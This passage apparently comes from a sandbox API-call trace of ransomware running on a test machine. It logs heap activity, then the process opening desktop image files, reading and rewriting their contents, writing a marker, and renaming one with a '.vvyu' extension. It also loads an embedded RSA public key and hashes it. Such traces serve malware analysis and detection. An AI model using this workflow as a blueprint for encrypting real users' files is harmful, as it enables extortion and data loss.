hHeap=0x620000) returned 1 [0192.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95188 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e951d0 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.352] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e96a68 [0192.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e96c88 [0192.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96c88 | out: hHeap=0x620000) returned 1 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935d0 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c935b8 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.355] GetCurrentThreadId () returned 0x66c [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e2f0 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.355] GetCurrentThreadId () returned 0x66c [0192.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935d0 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93630 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93648 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935e8 [0192.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935b8 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e96a68 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e96c78 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e96e90 [0192.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96c78 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e90 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e951d0 | out: hHeap=0x620000) returned 1 [0192.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.367] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x125dd, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x125dd, lpOverlapped=0x0) returned 1 [0192.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.368] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x125e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.368] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.371] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.371] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.371] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.371] CloseHandle (hObject=0x568) returned 1 [0192.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0192.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e96a68 [0192.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0192.377] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\I5zFv_jkMMjeubUquS.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\i5zfv_jkmmjeubuqus.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\I5zFv_jkMMjeubUquS.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\i5zfv_jkmmjeubuqus.gif.vvyu")) returned 1 [0192.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.381] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0192.384] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8b27c80, ftCreationTime.dwHighDateTime=0x1d89b9f, ftLastAccessTime.dwLowDateTime=0xec6ca6a0, ftLastAccessTime.dwHighDateTime=0x1d8a41d, ftLastWriteTime.dwLowDateTime=0xec6ca6a0, ftLastWriteTime.dwHighDateTime=0x1d8a41d, nFileSizeHigh=0x0, nFileSizeLow=0x1084a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IjDhLcko.jpg", cAlternateFileName="")) returned 1 [0192.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e951d0 [0192.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e951d0 | out: hHeap=0x620000) returned 1 [0192.384] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\IjDhLcko.jpg") returned=".jpg" [0192.384] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IjDhLcko.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ijdhlcko.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.385] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=67658) returned 1 [0192.385] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.388] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x10824, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.388] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.390] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.390] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1084a, lpOverlapped=0x0) returned 1 [0192.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.391] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.393] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.393] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.393] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.394] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.394] 